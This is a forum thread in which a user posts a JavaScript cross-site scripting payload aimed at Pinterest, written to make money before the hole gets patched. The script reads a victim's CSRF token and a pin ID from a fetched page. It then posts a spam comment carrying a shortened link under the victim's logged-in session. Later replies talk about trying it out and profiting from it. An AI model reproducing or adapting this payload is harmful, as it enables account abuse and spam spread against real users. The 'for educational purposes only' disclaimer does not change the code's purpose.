1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Pinterest XSS javascript payload [Advanced]

Discussion in 'Social Networking Sites' started by Fuggz, Apr 18, 2012.

  1. Fuggz

    Fuggz Power Member

    Joined:
    Mar 25, 2010
    Messages:
    584
    Likes Received:
    602
    I posted this in the VIP section but it didn't get too much appreciation and I think that there may be other members that will be able to use this. This isn't for members unfamiliar with XSS or javascript, but it is a good source to see the code that Pinterest uses for things (function parameters variables ect.) If you find an XSS vulnerability to execute this script, you could use this type of code to make some very nice $$$ before they find out and patch it.


    Code:
    [COLOR=#FFFFCC][FONT=Tahoma][I]getEmail();[/I][/FONT][/COLOR]
    
    
    [COLOR=#FFFFCC][FONT=Tahoma][I]function getEmail() {[/I][/FONT][/COLOR]
    [COLOR=#FFFFCC][FONT=Tahoma][I]var xmlhttp = new XMLHttpRequest();[/I][/FONT][/COLOR]
    [COLOR=#FFFFCC][FONT=Tahoma][I]xmlhttp.open("GET", "http://pinterest.com/popular",true);[/I][/FONT][/COLOR]
    
    [COLOR=#FFFFCC][FONT=Tahoma][I]xmlhttp.onreadystatechange=function() {[/I][/FONT][/COLOR]
    
    [COLOR=#FFFFCC][FONT=Tahoma][I]if (xmlhttp.readyState==4) {[/I][/FONT][/COLOR]
    [COLOR=#FFFFCC][FONT=Tahoma][I]var html = xmlhttp.responseText;[/I][/FONT][/COLOR]
    [COLOR=#FFFFCC][FONT=Tahoma][I]var email = html.match("csrfmiddlewaretoken' value='(.*)' /></div>");[/I][/FONT][/COLOR]
    [COLOR=#FFFFCC][FONT=Tahoma][I]var code = html.match('form action="/pin/(.*)/comment/');[/I][/FONT][/COLOR]
    [COLOR=#FFFFCC][FONT=Tahoma][I]updateProfile(code[1], email[1]);[/I][/FONT][/COLOR]
    [COLOR=#FFFFCC][FONT=Tahoma][I]}[/I][/FONT][/COLOR]
    [COLOR=#FFFFCC][FONT=Tahoma][I]}[/I][/FONT][/COLOR]
    [COLOR=#FFFFCC][FONT=Tahoma][I]xmlhttp.send(null);[/I][/FONT][/COLOR]
    [COLOR=#FFFFCC][FONT=Tahoma][I]}[/I][/FONT][/COLOR]
    
    
    [COLOR=#FFFFCC][FONT=Tahoma][I]function updateProfile(code, email) {[/I][/FONT][/COLOR]
    [COLOR=#FFFFCC][FONT=Tahoma][I]var httpwp = new XMLHttpRequest();[/I][/FONT][/COLOR]
    [COLOR=#FFFFCC][FONT=Tahoma][I]var urlwp="http://pinterest.com/pin/"+code+"/comment/";[/I][/FONT][/COLOR]
    [COLOR=#FFFFCC][FONT=Tahoma][I]var paramswp="text=get free makeup girls before it runs out [/I][/FONT][/COLOR]:)[COLOR=#FFFFCC][FONT=Tahoma][I] http://bit.ly/zEpIbC&replies=&home=1";[/I][/FONT][/COLOR]
    
    [COLOR=#FFFFCC][FONT=Tahoma][I]httpwp.open("POST", urlwp, true);[/I][/FONT][/COLOR]
    
    [COLOR=#FFFFCC][FONT=Tahoma][I]httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");[/I][/FONT][/COLOR]
    [COLOR=#FFFFCC][FONT=Tahoma][I]httpwp.setRequestHeader("Content-length", paramswp.length);[/I][/FONT][/COLOR]
    [COLOR=#FFFFCC][FONT=Tahoma][I]httpwp.setRequestHeader("Connection", "keep-alive");    [/I][/FONT][/COLOR]
    [COLOR=#FFFFCC][FONT=Tahoma][I]httpwp.setRequestHeader("X-CSRFToken", email);[/I][/FONT][/COLOR]
    [COLOR=#FFFFCC][FONT=Tahoma][I]httpwp.setRequestHeader("Referer", "http://pinterest.com/pin/"+code+"/");[/I][/FONT][/COLOR]
    [COLOR=#FFFFCC][FONT=Tahoma][I]httpwp.setRequestHeader("X-Requested-With", "XMLHttpRequest");[/I][/FONT][/COLOR]
    
    [COLOR=#FFFFCC][FONT=Tahoma][I]httpwp.onreadystatechange = function() { //Call a function when the state changes.[/I][/FONT][/COLOR]
    [COLOR=#FFFFCC][FONT=Tahoma][I]if(httpwp.readyState == 4 && httpwp.status == 200){[/I][/FONT][/COLOR]
    
    
    [COLOR=#FFFFCC][FONT=Tahoma][I]}[/I][/FONT][/COLOR]
    
    [COLOR=#FFFFCC][FONT=Tahoma][I]}[/I][/FONT][/COLOR]
    
    [COLOR=#FFFFCC][FONT=Tahoma][I]httpwp.send(paramswp); [/I][/FONT][/COLOR]
    [COLOR=#FFFFCC][FONT=Tahoma][I]}[/I][/FONT][/COLOR]
    *For educational purposes only*
     
    • Thanks Thanks x 3
  2. midnight_focus

    midnight_focus Power Member

    Joined:
    Dec 2, 2008
    Messages:
    779
    Likes Received:
    480
    Location:
    blogger
    I'll try to find a way to make some $$ with this and post it here
     
  3. dougphillip

    dougphillip Newbie

    Joined:
    Jan 30, 2013
    Messages:
    27
    Likes Received:
    9
    Interesting
     
  4. mnr39pro

    mnr39pro Newbie

    Joined:
    Oct 27, 2012
    Messages:
    35
    Likes Received:
    1
    can you please explain what th code do exactely ?
     
  5. Gogol

    Gogol Elite Member

    Joined:
    Sep 10, 2010
    Messages:
    3,114
    Likes Received:
    2,892
    Gender:
    Male
    R u kidding me ?:smashfrea

    Mmm i smell money!!! Thanks added! I will try it out :)
     
  6. danny0085

    danny0085 Junior Member

    Joined:
    Jan 26, 2012
    Messages:
    149
    Likes Received:
    27
    Location:
    Bolivia
    Is this still working?